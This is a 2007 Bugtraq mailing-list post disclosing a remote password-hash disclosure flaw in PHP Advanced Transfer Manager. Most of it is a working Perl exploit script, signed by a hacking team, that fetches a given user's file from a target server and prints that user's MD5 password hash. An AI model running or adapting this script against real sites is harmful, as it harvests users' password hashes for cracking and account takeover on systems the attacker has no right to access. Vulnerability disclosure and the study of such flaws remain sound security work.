[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7436.82.99.198.186.1168937634.squirrel@onhackerline.ir>
Date: Tue, 16 Jan 2007 03:53:54 -0500 (EST)
From: nightmare@...ackerline.ir
To: bugtraq@...urityfocus.com
Subject: PHPATM Remote Password Disclosure Vulnerablity
Hi
Application : php advanced transfer manager
Vulnerability Kind : Remote Password Hash Discloure
Product Link : phpatm.free.fr
version : All Versions Affected
mail: only_satsat@...oo.com
Author : Black-0ut
exploit :
#/usr/bin/perl
######################################################
# #
# K@V@NIR@N Security Team #
# Coded & Discovered by Red_Dragon #
# #
######################################################
use LWP::Simple;
$ha=$ARGV[0];
$pa=$ARGV[1];
$ur=$ARGV[2];
if (!$ARGV[1]) {
print"\n";
print "[+] Coded By Red_Dragon or H3CT0R3 [+]\n";
print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n";
print "[+] http://onhackerline.ir/ [+] \n";
print "[+] Black 0ut Frenzy Team [+] \n";
print"\n";
print "ex : www.ex.com /path/ <USER>\n";
exit;
}
$vul="users/".$ur;
$start = get("http://".$ha.$pa.$vul) || die "[-] Unable to retrieve: $!";
print "\n";
print "[+] Connected to : $ha";
$start=~m/([a-f0-9]{32})/;
print "\n";
print "[+] Username : $ur\n";
print "[+] MD5 Hash : $1\n";
TNX
Powered by blists - more mailing lists